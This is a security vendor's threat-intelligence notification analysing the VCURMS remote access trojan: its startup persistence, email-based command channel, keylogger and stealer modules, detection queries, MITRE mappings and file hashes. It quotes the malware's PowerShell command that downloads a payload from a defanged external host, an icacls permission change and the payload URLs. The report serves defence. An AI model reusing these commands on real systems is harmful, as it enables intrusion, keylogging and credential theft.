Threat Analysis Unit - Threat Intelligence Notification
Title: VCURMS RAT
Summary
A malicious Java downloader was recently found in a phishing campaign to propagate the new VCURMS RAT. Throughout the campaign, the attacker employs email as its command and control system. To increase the RAT's capabilities, it also installs a keylogger and credential stealer.
Behavioral Summary
When executed it first copies itself to “%AppData%\Microsoft\Windows\Start Menu\Programs\Startup” with name “MyStartupProgram.jar” as shown in Figure 1 below:
Figure 1. Main function code
It then downloads a new Java runtime environment (JRE) in a zip file to “C:\Users\username\AppData\cookie\jre\jre.zip.” After being unzipped, this JRE environment will be used to execute further Java payloads.
powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/jre.jpg', 'C:\Users\username\AppData\cookie\jre\jre.zip')"
Furthermore, the malware executes a command to utilize icacls permissions in order to control file access. This command grants all users permission to access the .oracle_jre_usage folder:
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
For VCURMS to receive commands and exfiltrate data it uses the email API as its C2. The first ping email with text "Hey master, I'm online”. It routinely executes the CheckInboxTask() function, shown in the code below, to verify the commands and tasks that come in the form of emails.
Figure 2. Email enumeration for commands
The VCRUMS RAT supports below listed commands which will be executed on compromised machines.
Command
|
Description
|
get information
|
Retrieve system details such as the Operating System, RAM Size, Computer Name, Volume ID, User Name, User Country, Documents Folder Files, Desktop files.
|
shell
|
Execute the specified command in email and send the result back in email.
|
recovery
|
Download the stealer JAR file from hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/stl2.jpg and renames at \AppData\cookie\st.jar and execute it.
|
start keylogger
|
Download the keylogger JAR from hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/kl.jpg then renames it to \AppData\cookie\klog.jar and execute it.
|
get keylogger
|
Upload the monitored keylogs which are stored at \AppData\cookie\klogs.txt and send it as an attachment.
|
upload
|
Send the file specified in command as a compressed attachment to email.
|
download
|
Download additional payloads which are attached to email with the .jpg extension.
|
search
|
Search the files matching with a specific keyword on the system and send the list to the attacker in email.
|
Table 1. List of commands supported by VCURMS RAT
We can see the process chart of VCURMS RAT as shown in Figure 3 below:
Figure 3. Process Tree
Customer Protection
VMware Carbon Black Endpoint Standard (CB Defense)
The recommended policy at a minimum is to block all types of malwares from executing (Known, Suspect, and PUP) as well as delay execution for cloud scan to get maximum benefit from VMware Carbon Black Cloud reputation service.
Sensors running with version 3.8 or greater will have Core Prevention rules to block TTPs that are often used by threat actors such as Advanced Scripting Prevention, Credential Theft, and Privilege Escalation protection.
In addition, the following policy will prevent this style of attack from being executed:
Process
|
Operation Attempt
|
Action
|
Applications at Path
**\cookie\jre\java*.exe
|
Communicates over the network
Invokes a command interpreter
|
Deny operation
|
As always, our best practice recommendation is to deploy this rule to a small subset of sensors, assess, then define permissions to reduce any false positives. After confirming no false positives in your environment, deploy across additional groups.
VMware Carbon Black App Control (CB Protection)
The most effective way of blocking this malware is by running App Control in High or Medium enforcement. Other than that, customers in low enforcement can enable the following Rapid Config as an additional layer of protection to prevent and alert malware that executes during different phases of attacks:
- Browser Protection
- Microsoft Office Protection
- PowerShell Protection
- Ransomware Protection
- Reconnaissance and Exfiltration Protection
- Suspicious Command Line Protection
- Suspicious Application Protection
- WMI Protection
Implementation: As always, our best-practice recommendation is to create all custom rules in “Report” mode first, assess for false positives, and create any higher ranking execute allow rules to prevent legitimate blocks. After confirming no false positives in your environment, you can then change to Block.
Customer Action: Ban known hashes from the IOC in the environment
VMware Carbon Black EDR and Cloud Enterprise EDR
The PSC Threat Feeds will detect the known hashes for this malware. Customers can ban known hashes as well, which are in the IOC section of this report.
Many existing queries that are in the MITRE ATT&CK, SANS, CB Endpoint Visibility, and CB Advanced Threat feeds will also alert on characteristics associated with these families.
Name
|
Query
|
Defense Evasion - Permission Modifications - icacls/cacls/takeown
|
VMware Carbon Black EDR:
(process_name:takeown.exe OR process_name:icacls.exe OR process_name:cacls.exe) -cmdline:ProgramData\Intel\Wireless -cmdline:AppData\Roaming\Adobe\UPI\* -cmdline:ProgramData\Lenovo\SystemUpdate\* -cmdline:ProgramData\Lenovo\ImController\*
Cloud Enterprise EDR:
((process_name:takeown.exe OR process_name:icacls.exe OR process_name:cacls.exe) -process_cmdline:ProgramData\\Intel\\Wireless -process_cmdline:AppData\\Roaming\\Adobe\\UPI\* -process_cmdline:ProgramData\\Lenovo\\SystemUpdate\* -process_cmdline:ProgramData\\Lenovo\\ImController\*) -enriched:true
|
Execution - AMSI - PowerShell Downloading Behaviors Detected
|
VMware Carbon Black EDR:
(fileless_scriptload_cmdline:.downloadfile OR fileless_scriptload_cmdline:.downloaddata OR fileless_scriptload_cmdline:.downloadstring) AND -(fileless_scriptload_cmdline:chocolatey.org*)
Cloud Enterprise EDR:
(fileless_scriptload_cmdline:.downloadfile OR fileless_scriptload_cmdline:.downloaddata OR fileless_scriptload_cmdline:.downloadstring OR scriptload_content:.downloadfile OR scriptload_content:.downloaddata OR scriptload_content:.downloadstring) AND NOT (fileless_scriptload_cmdline:chocolatey.org* OR scriptload_content:chocolatey.org*)
|
Execution - Command-Line Interface (Cmd.Exe /C)
|
VMware Carbon Black EDR:
((process_name:cmd.exe and cmdline:/c) and -childproc_name:facefoduninstaller.exe)
Cloud Enterprise EDR:
(((process_name:cmd.exe AND process_cmdline:\/c) AND -childproc_name:facefoduninstaller.exe)) -enriched:true
|
Implementation: As always, our best practice recommendation is to tune in for any false positives before creating new watchlists.
Customer Action: Test and Deploy Watchlist and ban known hash values. For any hits, investigate the file modifications, network connections, cross process injection(s) and child processes.
MITRE ATT&CK TIDs
TID
|
Tactic
|
Description
|
T1204.002
|
Execution
|
User Execution: Malicious File
|
T1059.003
|
Execution
|
Command and Scripting Interpreter
|
T1614
|
Discovery
|
System Location Discovery
|
T1083
|
Discovery
|
File and Directory Discovery
|
T1005
|
Collection
|
Data from Local System
|
T1056.001
|
Collection
|
Input Capture: Keylogging
|
T1555.003
|
Credential Access
|
Credentials from Password Stores: Credentials from Web Browsers
|
T1140
|
Defense Evasion
|
Deobfuscate/Decode Files or Information
|
T1222.001
|
Defense Evasion
|
File and Directory Permissions Modification
|
T1071
|
Command and Control
|
Application Layer Protocol: Mail Protocols
|
T1105
|
Command and Control
|
Ingress Tool Transfer
|
Table 2. MITRE ATT&CK TIDs
Indicators of Compromise (IOCs)
Indicator
|
Type
|
Context
|
588d6f6feefa6273c87a3f8a15e2089ee3a063d19e6a472ffc0249298a72392d
|
SHA256
|
VCURMS RAT(Windows.jar)
|
2cc7ad706df895cf88048d9303e8b3bcc2e74f1b
|
SHA1
|
VCURMS RAT(Windows.jar)
|
39a6f4c34b2309c2f99f6859ed7dec29
|
MD5
|
VCURMS RAT(Windows.jar)
|
Table 3. Indicator of compromise
About TAU-TIN
TAU-TIN (Threat Analysis Unit - Threat Intelligence Notification) is a report by Carbon Black's TAU (Threat Analysis Unit) to help customers detect and prevent emerging threats.
To receive future notifications, navigate to the TAU-TIN label on UeX and then click Subscribe.